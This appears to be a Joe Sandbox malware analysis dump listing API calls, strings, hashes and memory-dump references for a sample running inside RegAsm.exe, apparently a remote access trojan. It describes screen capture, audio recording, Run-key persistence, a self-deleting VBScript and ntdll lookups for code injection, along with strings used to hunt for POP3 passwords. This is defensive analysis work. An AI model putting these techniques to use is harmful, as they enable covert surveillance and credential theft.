                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1084509184-0
                                                                                                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                          APIs
                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                          • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                          • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                          • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                          • String ID: DISPLAY
                                                                                                                          • API String ID: 4256916514-865373369
                                                                                                                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                          • API String ID: 1861856835-1447701601
                                                                                                                          • Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                          • Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                                                                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63781986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                          • API String ID: 3797177996-2483056239
                                                                                                                          • Opcode ID: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                          • Opcode Fuzzy Hash: ff441d04d561ddd7c833bcb51d5ea1663e6cd4c68d93212227685ad438b1ef63
                                                                                                                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                          APIs
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02x,00000003), ref: 004124CF
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                          • String ID: .exe$02x$8SG$WDH$exepath$open$temp_
                                                                                                                          • API String ID: 2649220323-2346805645
                                                                                                                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                          APIs
                                                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                          • API String ID: 738084811-2094122233
                                                                                                                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Write$Create
                                                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                                                          • API String ID: 1602526932-4212202414
                                                                                                                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                          • API String ID: 1646373207-255920310
                                                                                                                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                          • API String ID: 4218353326-3023110444
                                                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                          APIs
                                                                                                                          • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02x,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                          • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                          • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                          • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                          • _wcslen.LIBCMT ref: 0040D001
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                          • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                          • String ID: 02x$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                          • API String ID: 1579085052-4000683985
                                                                                                                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                          • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                          • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                          • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
